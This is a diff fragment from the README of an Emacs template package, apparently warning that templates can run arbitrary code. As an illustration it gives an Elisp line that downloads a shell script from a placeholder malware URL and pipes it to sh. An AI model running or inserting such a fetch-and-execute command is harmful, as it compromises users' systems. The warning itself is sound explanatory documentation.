nbfalcon/ptemplate/README.md

 (shell-command "wget $SH_MALWARE_URL | sh")
 ```

-At that point, all security would be lost: the malicious shell script could nuke
+At that point, it's game over: the malware shell script could inject itself into
-your home directory, implant a .profile-based rootkit, modify user-owned
-software, ....
-The possibilities are endless.
+all files you own (.profile "rootkits" for example), nuke your home directory or
+do lots of other evil things, but that is a problem with software in general
+(*any* Emacs plugin could do the same).